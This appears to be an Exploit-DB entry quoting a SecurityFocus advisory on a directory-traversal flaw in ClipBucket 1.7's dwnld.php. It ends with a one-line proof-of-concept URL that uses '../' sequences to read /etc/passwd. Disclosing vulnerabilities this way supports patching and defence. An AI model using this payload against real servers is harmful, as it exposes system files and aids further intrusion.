Clipbucket 1.7 - 'dwnld.php' Directory Traversal

EDB-ID:

32802

CVE:



Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2009-02-16


source: https://www.securityfocus.com/bid/33781/info

ClipBucket is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.

ClipBucket 1.7 is vulnerable; other versions may also be affected. 

http://www.example.com/dwnld.php?file=../../../../etc/passwd